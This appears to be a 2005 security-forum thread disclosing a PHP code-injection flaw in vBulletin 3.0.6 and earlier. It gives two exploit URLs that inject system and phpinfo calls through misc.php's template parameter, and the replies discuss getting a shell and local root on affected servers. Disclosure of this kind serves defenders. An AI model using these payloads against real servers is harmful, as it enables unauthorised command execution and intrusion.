 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 219
 Members: 0
 Total: 219
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
vBulletin 3.0.6 and prior versions Exec commands in server |
|
 Posted: Wed Feb 23, 2005 2:39 pm |
 |
|
| LINUX |
| Moderator |
 |
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
 |
|
 |
|
vBulletin Version(s): 3.0.6 and prior versions
in the processing of template names. A remote user can execute PHP commands in certain cases.
If the 'Add Template Name in HTML Comments' option is enabled (which is not the default configuration and is not recommended by the vendor for use in a production environment), a remote user can submit PHP code in the 'template' parameter in 'misc.php'
Real Life code exploit
| Code: | | http://[target]//forum/misc.php?do=page&template={${system(id)}} |
| Code: | | http://[target]//forum/misc.php?do=page&template={${phpinfo()}} |
www.sosvulnerable.net - svsecurity@gmail.com |
|
|
|
|
| Posted: Wed Feb 23, 2005 4:40 pm |
|
|
| Alkaen |
| Regular user |
 |
|
| Joined: Feb 16, 2005 |
| Posts: 5 |
| Location: Bahrain - Aldair |
|
|
|
|
|
|
Thanx dude
& wait alot of exploit in vBulletin Version 3.0.6
Alkaen.. |
|
|
|
|
| Posted: Wed Feb 23, 2005 9:47 pm |
|
|
| SteX |
| Advanced user |
 |
|
| Joined: May 18, 2004 |
| Posts: 181 |
| Location: Serbia |
|
|
|
|
|
|
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
| Posted: Thu Feb 24, 2005 10:43 am |
|
|
| Zeelock |
| Active user |
 |
|
| Joined: Jan 27, 2005 |
| Posts: 29 |
| Location: Where stars come out at night |
|
|
|
|
|
|
|
_________________
If it seems to be impossible, just step up your level! |
|
|
|
| Posted: Thu Feb 24, 2005 4:07 pm |
|
|
| HaCkZataN |
| Regular user |
|
|
| Joined: Feb 23, 2005 |
| Posts: 11 |
|
|
|
|
|
|
|
| if the server has SAFE MODE ON mmm i dont think that will be useful |
|
|
|
|
| Posted: Thu Mar 24, 2005 4:22 pm |
|
|
| octane |
| Beginner |
 |
|
| Joined: Mar 24, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
| cant you like execute a small shell on the server? if its running windows for example? |
|
|
|
|
| Posted: Fri Mar 25, 2005 12:56 pm |
|
|
| Injector |
| Active user |
|
|
| Joined: Dec 29, 2004 |
| Posts: 49 |
|
|
|
|
|
|
|
| octane wrote: | | cant you like execute a small shell on the server? if its running windows for example? |
You cant execute simple commands like ls, pwd etc. but thats pretty much it
especially that vbulletin is secure you wont really go far with that exploit |
|
|
|
|
| Posted: Fri Mar 25, 2005 1:22 pm |
|
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| Zeelock wrote: |
Made by Pokleyzz |
pokyleyzz WAS HERE !!!
heuheueue |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
| Posted: Fri Mar 25, 2005 2:07 pm |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| HaCkZataN wrote: | | if the server has SAFE MODE ON mmm i dont think that will be useful |
for further information we cpuld look php manual (good if u have compiled html (.chm)) then u could see what function restriction by safe_mode
 |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
| Posted: Sat Mar 26, 2005 3:20 pm |
|
|
| octane |
| Beginner |
|
|
| Joined: Mar 24, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
| Injector wrote: | | octane wrote: | | cant you like execute a small shell on the server? if its running windows for example? |
You cant execute simple commands like ls, pwd etc. but thats pretty much it
especially that vbulletin is secure you wont really go far with that exploit |
so what good does this exploit do if you cant get root  |
|
|
|
|
| Posted: Sat Mar 26, 2005 3:34 pm |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| octane wrote: | | Injector wrote: | | octane wrote: | | cant you like execute a small shell on the server? if its running windows for example? |
You cant execute simple commands like ls, pwd etc. but thats pretty much it
especially that vbulletin is secure you wont really go far with that exploit |
so what good does this exploit do if you cant get root |
at least you inside the machine 
after that USE your brain :LOL: |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
| Posted: Tue Mar 29, 2005 8:53 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| octane wrote: | | Injector wrote: | | octane wrote: | | cant you like execute a small shell on the server? if its running windows for example? |
You cant execute simple commands like ls, pwd etc. but thats pretty much it
especially that vbulletin is secure you wont really go far with that exploit |
so what good does this exploit do if you cant get root |
Then you need good local root exploit |
|
|
|
|
| Posted: Mon Jul 18, 2005 10:38 am |
|
|
| logan |
| Beginner |
|
|
| Joined: Jul 10, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
